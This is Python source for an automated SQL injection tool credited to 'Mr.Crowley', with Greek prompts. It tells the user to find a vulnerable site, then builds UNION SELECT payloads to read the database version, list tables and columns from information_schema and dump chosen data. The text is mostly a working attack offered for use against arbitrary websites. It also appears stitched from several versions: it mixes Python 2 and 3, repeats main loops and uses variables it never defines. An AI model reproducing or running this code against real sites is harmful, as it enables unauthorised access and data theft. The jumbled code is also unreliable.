print "BETA VERSION\n"
print "|<~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>|"
print "|<~~~~~~~ Sql Injection Tool ~~~~~~~>|"
print "|<~~~~~~ Coded By: Mr.Crowley ~~~~~~>|"
print "|<~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>|\n"
print "Instructions:"
print "Find a vulnerable to sql-injection site"
print "paste below the url and let the fun begin! =D"
print "Example: http://www.somesite.com/articles.php?id=1'\n\n"
flag='1'
while flag=='1':
site=raw_input("Give the url: ")
if "'" in site:
site = site_alive(site)
flag = vuln(site)
columns,based=ft_cols(site)
site=uni_cols(site,columns,based)
site=site.replace(flag,flag+"-")
print site
vuln_column=str(f_vuln_col(site,columns))
site=replaces.repl(site,1,vuln_column)
dbs.version(site)
dbs.user(site)
dbs_names=dbs.names(site)
ans=dbs.working_db(site)
if option == "1":
flag = 1
while flag:
# the first param given from terminal, $ python main.py site.com
try:
site = sys.argv[1]
except IndexError:
print('Enter a url to test:')
site = input(">>> ")
# Vazeis edw to url tou site pou einai eupa8es
# site = "http://www.xxx.xxx/sql.php?id=1'"
if "'" in site:
site = site_alive(site)
vuln_param = vuln(site)
flag = 0
else:
print("Site doesn't look vulnerable")
print("Enter url with ' :")
site = input(">>> ")
if not flag:
find_data = InjectDatabase(site, vuln_param)
find_data.total_columns()
find_data.vulnerable_column()
find_data.database_information()
find_data.find_tables_of_database()
find_data.select_table()
find_data.search_data_from_columns()
def union_normal(self):
versions = ["5.1.41","5.1.61","5.0.96","5.1.66","5.1.56"]
check = 3
flag='1'
while flag=='1':
a=1
site=raw_input("Give the url: ")
site=site_alive(site)
if site=="-1":
print "No response from server"
print "Program will exit"
exit()
flag=vuln(site)
if flag=="-1":
exit()
site1=site
site1=site1+"+OrDER+By+"
columns=ft_cols(site,site1)
if columns==-1:
exit()
site1=site1.replace("+OrDER+By+","")
num_columns="1"
for i in range (2,columns+1):
if i==(columns+1):
num_columns=num_columns+str(i)
else:
num_columns=num_columns+","+str(i)
site=site1+"+UNION+SELECT+%s--" %num_columns
site=site.replace("'","")
site=site.replace(flag,flag+"-")
vuln_column=1
flag=1
the_page = get_the_page(site)
while flag==1:
if (">"+str(vuln_column)+"<") in the_page:
flag=0
else:
vuln_column=vuln_column+1
if vuln_column>columns:
flag=2
if flag==2:
print "Den uparxoun vulnerable columns"
print "Program will exit"
exit()
vuln_column=str(vuln_column)
site=site.replace(",%s" %vuln_column,",@@version",1)
the_page=get_the_page(site)
flag=1
index=0
while index<len(versions):
if versions[index] in the_page:
print "SQL Version: %s" %versions[index]
index=len(versions)+1
else:
index=index+1
if flag==1:
if ("5.0" in the_page) or ("5.1" in the_page):
flag=0
if flag==1:
print "Could not get the DB version."
print "Program will exit"
exit()
site=site.replace("@@version","unhex(hex(group_concat(0x3a,0x3a,table_name,0x3a,0x3a,0x0a)))")
site=site.replace("--","+FROM+information_schema.tables+WHERE+table_schema=database()--")
the_page=get_the_page(site)
tables=s_data.search_for(the_page)
print "Tables found %d" %len(tables)
print tables
site=site.replace("table_name","column_name")
site=site.replace("+FROM+information_schema.tables+WHERE+table_schema=database()--","+FROM+information_schema.columns+WHERE+table_name=0x")
flag=1
site1=site
while flag==1:
print "Give the table: "
table1=raw_input(">>>")
while not(table1 in tables):
print "Wrong input. Give the table: "
table1=raw_input(">>>")
table1=table1.encode("hex")
site=site1+table1+"--"
the_page=get_the_page(site)
columns_found=s_data.search_for(the_page)
if len(columns_found)==0:
print "No columns found. Do you want to try an other table? (y/n)"
ans=raw_input(">>>")
while not(ans=='y' or ans=='n' or ans=='Y' or ans=='N'):
print "No columns found. Do you want to try an other table? (y/n)"
ans=raw_input(">>>")
if ans=='N' or ans=='n':
print 'Program will Exit'
exit()
else:
flag=1
elif flag==1:
print "Columns Found %d" %len(columns_found)
print "="*80
print columns_found
print "="*80
k=0
ks=[]
table_choose=table1.decode("hex")
site=site.replace("information_schema.columns+WHERE+table_name=0x"+table1+"--",table_choose+"--")
tal_cols=len(columns_found)
while tal_cols>0:
col_choose=raw_input("Dose ena column (0 gia na mhn dwseis kanena allo): ")
while not(col_choose in columns_found) and not(col_choose=='0'):
col_choose=raw_input("Dose ena column (0 gia na mhn dwseis kanena allo): ")
if col_choose=="0":
tal_cols=0
site=site.replace(",/**/","")
else:
if tal_cols==len(columns_found):
site=site.replace("column_name","%s,/**/" %col_choose)
tal_cols=tal_cols-1
k=1
ks.append(col_choose)
else:
site=site.replace(",/**/",",0x3a,0x3a,%s,/**/"%col_choose)
tal_cols=tal_cols-1
if tal_cols==0:
site=site.replace(",/**/",'')
ks.append(col_choose)
k=k+1
the_page=get_the_page(site)
length=len(the_page)
if k%2==1:
total_data=s_data.search_for(the_page)
else:
total_data=s_data.search_for_2(the_page,k)
length=len(total_data)
l=0
for i in range (0,length,k):
j=0
while j<k:
if j+1==k:
print ks[j],":",total_data[l],"|"
j=j+1
l=l+1
else:
print ks[j],":",total_data[l],"|",
j=j+1
l=l+1
ans=raw_input("8es na deis gia allo table? (y/n): ")
while not (ans=='y' or ans=='Y' or ans=='n' or ans=='N'):
ans=raw_input("8es na deis gia allo table? (y/n): ")
if ans=='y' or ans=='Y':
flag=1
else:
flag=0
def vuln(site):
vuln_move = 0
if '=' in site:
flag=''
for index in range(len(params)):
if params[index] in site:
flag=params[index]
if flag!='':
site = site.replace(flag,flag+"'")
the_page=get_the_page(site)
index=0
length=len(errors)
while index<length and vuln_move==0:
if errors[index] in the_page:
print "The site is Sqli Vulnerable"
print "The error is: %s" %errors[index]
print "="*80
vuln_move=1
else:
index=index+1
if vuln_move==0:
print "Is this the vulnerable parameter %s?(y/n)" %flag
ans=raw_input()
while ans!='y' and ans!='Y' and ans!='n' and ans!='N':
print "WRONG INPUT! \nIs this the vulnerable parameter %s?(y/n)" %params[index]
ans=raw_input()
if ans=='Y' or ans=='y':
print 'This parameter is not vulnerable'
print 'Program will exit'
return("-1")
if ans=='N' or ans=='n':
print "Give me the vulnerable parameter: "
parameter=raw_input()
site.replace(parameter,parameter+"'")
the_page=get_the_page(site)
index=0
while index<length and vuln_move==0:
if errors[index] in the_page:
print "The site is Sqli Vulnerable"
print "The error is: %s" %errors[index]
print "="*80
vuln_move=1
else:
index+=1
if vuln_move==0:
print 'This parameter is not vulnerable'
print 'Program will exit'
return("-1")
else:
return(flag)
else:
print "We could not get the vulnerable parameter"
print "Do you know which one is?(y/n)"
ans=raw_input()
while ans!='y' and ans!='Y' and ans!='n' and ans!='N':
print "WRONG INPUT! \nDo you know which one is?(y/n)"
ans=raw_input()
if ans=='n' or ans=='N':
print "Sorry sql-injection failed"
print "Program will exit"
return("-1")
else:
print "Give the vulnerable parameter: "
parameter=raw_input()
is_alive=site_alive(site)
site = site.replace(parameter+'=',parameter+'='+"'")
if is_alive==1:
the_page=get_the_page(site)
index=0
length=len(errors)
while index<length and vuln_move==0:
if errors[index] in the_page:
print "The site is Sqli Vulnerable"
print "The error is: %s" %errors[index]
print "="*80
vuln_move=1
else:
index=index+1
if vuln_move==1:
return (parameter)
else:
print "The parameter is not vulnerable"
print "Program will exit"
return ("-1")
else:
print "No response from the server"
print "Program will exit"
return ("-1")
else:
print "Are you sure that you gave the correct url?(y/n)"
ans=raw_input()
while ans!='y' and ans!='Y' and ans!='n' and ans!='N':
print "WRONG INPUT! \nAre you sure that you gave the correct url?(y/n)"
ans=raw_input()
if ans=='y' or ans=='Y':
print "This is not a vulnerable url"
print "Program will exit"
return ("-1")
else:
return ("1")
